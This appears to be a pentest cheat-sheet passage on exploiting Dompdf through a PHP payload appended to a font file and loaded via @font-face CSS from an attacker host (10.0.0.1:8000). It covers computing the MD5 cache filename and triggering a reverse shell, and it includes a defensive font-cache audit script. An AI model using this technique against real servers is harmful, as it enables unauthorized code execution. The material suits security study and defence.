Dompdf RCE
Dompdf is an HTML to PDF converter for PHP. It may be vulnerable to remote code execution or SSRF.
- [dompdf](https://github.com/dompdf/dompdf)
- [exploiting-rce-vulnerability-dompdf](https://www.optiv.com/insights/source-zero/blog/exploiting-rce-vulnerability-dompdf)
Exploitation
1. Create Malicious Font
First, prepare the malicious .ttf file.
Find a .ttf file on the local system, copy it to the current directory and change the extension from ttf to php, because we want a PHP script to be executed.
Then append the PHP payload to the end of the file.
2. Create Malicious CSS
Next, create a malicious CSS file that loads the “evil.php” above.

```css
@font-face {
    font-family: 'evil';
    src: url('http://10.0.0.1:8000/evil.php');
    font-weight: 'normal';
    font-style: 'normal';
}
```
3. Host PHP & CSS
Now both files are in the current working directory.
Start a web server to host them.
4. Send Request
On the target website, send a request that uploads the HTML as below.
Our “evil.php” is stored at /dompdf/lib/fonts/<font_name>_<font_weight/style>_<md5>.php, for example /dompdf/lib/fonts/evil_normal_2cddaeb743b6aeb5638ac0ac93c4c9f6.php.
To get the md5 hash, we can calculate it with the following command.
We can also use the Python hashlib module; the hash is the MD5 of the font URL given in the CSS.

```python
python3
>>> import hashlib
>>> hashlib.md5("http://10.0.0.1:8000/evil.php".encode("UTF-8")).hexdigest()
'2cddaeb743b6aeb5638ac0ac93c4c9f6'
```
5. Execute Malicious PHP via Cached File
Finally, with the cached file path from above, we can request the cached PHP file, which executes the malicious code.
For a reverse shell, start a listener locally first.
Then access the cached PHP file.
We get a shell in the local terminal.
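The defensive counterpart to the steps above, added here as an example and not part of the original page: an audit of the Dompdf font cache directory (/dompdf/lib/fonts on the page) that flags cached entries which are not genuine font files. It reuses the cache naming scheme the page describes, `<font_name>_<font_weight/style>_<md5(url)>.<ext>`, and checks three things: the extension is one of the font types Dompdf stores (the `FONT_EXTENSIONS` set is an assumption of this example), the file starts with a known font magic value (`FONT_MAGIC`, also an assumption), and no PHP open tag appears inside the data. The sample cache directory, the `build_sample_cache` helper and the file contents it writes are constructed for this example.

```python
import hashlib
import os
import re
import tempfile

# Cache file naming scheme described above: <name>_<weight/style>_<md5(url)>.<ext>
CACHE_NAME_RE = re.compile(
    r"^(?P<name>[^_]+)_(?P<style>[^_]+)_(?P<md5>[0-9a-f]{32})\.(?P<ext>\w+)$"
)

# Extensions a font cache is expected to hold (assumption for this example).
FONT_EXTENSIONS = {"ttf", "otf", "woff", "afm", "ufm"}

# Leading magic bytes of common font containers (assumption for this example):
# TrueType (0x00010000 or 'true'), CFF OpenType ('OTTO'), WOFF/WOFF2.
FONT_MAGIC = (b"\x00\x01\x00\x00", b"true", b"OTTO", b"wOFF", b"wOF2")

# A PHP open tag has no business inside font data.
PHP_TAG_RE = re.compile(rb"<\?php|<\?=")


def expected_cache_name(font_name, style, url, ext):
    """Reproduce the cache file name derived from a @font-face source URL
    (naming scheme as described in the text above)."""
    digest = hashlib.md5(url.encode("utf-8")).hexdigest()
    return f"{font_name}_{style}_{digest}.{ext}"


def audit_font_cache(cache_dir):
    """Return (filename, reason) tuples for suspicious cache entries.

    A font file with a PHP payload appended, as in the scenario above,
    keeps its font magic but trips the extension and PHP-tag checks."""
    findings = []
    for fname in sorted(os.listdir(cache_dir)):
        path = os.path.join(cache_dir, fname)
        if not os.path.isfile(path):
            continue
        m = CACHE_NAME_RE.match(fname)
        if not m:
            continue  # not a cached remote font (bundled fonts, cache index, ...)
        reasons = []
        if m.group("ext").lower() not in FONT_EXTENSIONS:
            reasons.append(f"non-font extension .{m.group('ext')}")
        with open(path, "rb") as fh:
            data = fh.read()
        if not data.startswith(FONT_MAGIC):
            reasons.append("missing font magic bytes")
        if PHP_TAG_RE.search(data):
            reasons.append("PHP open tag inside font data")
        if reasons:
            findings.append((fname, "; ".join(reasons)))
    return findings


def build_sample_cache():
    """Constructed sample: a throwaway cache directory holding one clean
    TrueType-looking file and one with a PHP tag appended."""
    d = tempfile.mkdtemp(prefix="dompdf_fonts_")
    clean = expected_cache_name("dejavu", "normal", "http://fonts.example/dejavu.ttf", "ttf")
    with open(os.path.join(d, clean), "wb") as fh:
        fh.write(b"\x00\x01\x00\x00" + b"\x00" * 64)
    tainted = expected_cache_name("evil", "normal", "http://10.0.0.1:8000/evil.php", "php")
    with open(os.path.join(d, tainted), "wb") as fh:
        fh.write(b"\x00\x01\x00\x00" + b"\x00" * 64 + b"<?php /* constructed marker */ ?>")
    return d, clean, tainted


if __name__ == "__main__":
    cache, _, _ = build_sample_cache()
    for name, reason in audit_font_cache(cache):
        print(f"SUSPICIOUS {name}: {reason}")
```

Run it periodically against the real font cache directory of a deployment, or wire it into a file-integrity job. It is a detective control only; the preventive fix is to keep remote resource loading disabled in the Dompdf options and to run a patched release.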
Exploitation (Automated)
We can also exploit this with the repository.
Modify the CSS and PHP to suit your situation. See the previous "Exploitation" section for the details of each file.
Then send the request.